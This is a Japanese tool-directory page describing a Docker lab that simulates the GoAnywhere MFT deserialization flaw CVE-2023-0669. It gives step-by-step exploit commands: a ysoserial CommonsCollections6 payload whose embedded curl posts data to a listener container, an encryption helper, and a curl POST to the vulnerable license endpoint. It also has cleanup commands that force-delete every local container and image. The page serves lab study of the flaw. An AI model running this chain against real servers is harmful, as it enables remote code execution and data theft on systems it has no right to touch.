Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2023-0669-simulation — CVE-2023-0669 のシミュレーション環境。Docker ベースの攻撃者、脆弱なサーバー、リスナーコンテナで構成。デシリアライゼーションエクスプロイトの生成、ペイロードの暗号化、データ流出の実演。 | Kitploit
ツール/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出コマンド&コントロール
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

CVE-2023-0669 のシミュレーション環境。Docker ベースの攻撃者、脆弱なサーバー、リスナーコンテナで構成。デシリアライゼーションエクスプロイトの生成、ペイロードの暗号化、データ流出の実演。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
78ヶ月前未レビュー

プロジェクト構成

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← créé automatiquement (exfiltration)

2. 3つのコンテナ(attacker, vulnerable, listener)を起動

docker-compose up --build

問題: docker compose up 実行時に KeyError: 'ContainerConfig' エラー

このプロジェクトには以下が必要です:

  • Docker Engine: v24 または v25 以上
  • Docker Compose: v2.20+ (Docker に自動的に含まれています) KeyError: 'ContainerConfig' は docker compose up で発生します。これは通常、古いまたは破損した Docker メタデータ、または古いイメージが原因です。 破損したコンテナ、イメージ、メタデータを削除:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

その後、クリーンに再構築:

docker compose build --no-cache

docker compose up

3. 攻撃者のコンテナに入る

docker exec -it attacker bash

ペイロードの生成(メッセージを送信するだけの安全なペイロード)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

ペイロードの暗号化

java CVE_2023_0669_helper payload.ser 1

→ 表示される長い文字列をすべてコピー (Ctrl+A の後に Ctrl+C)

エクスプロイトの送信 (コピーした文字列で LA_CHAINE を置き換え)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. 即時結果

リスナーのログ(または PC 上の ./received フォルダ)に次のように表示されます:

PWNED ! Reçu 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

ツールをダウンロード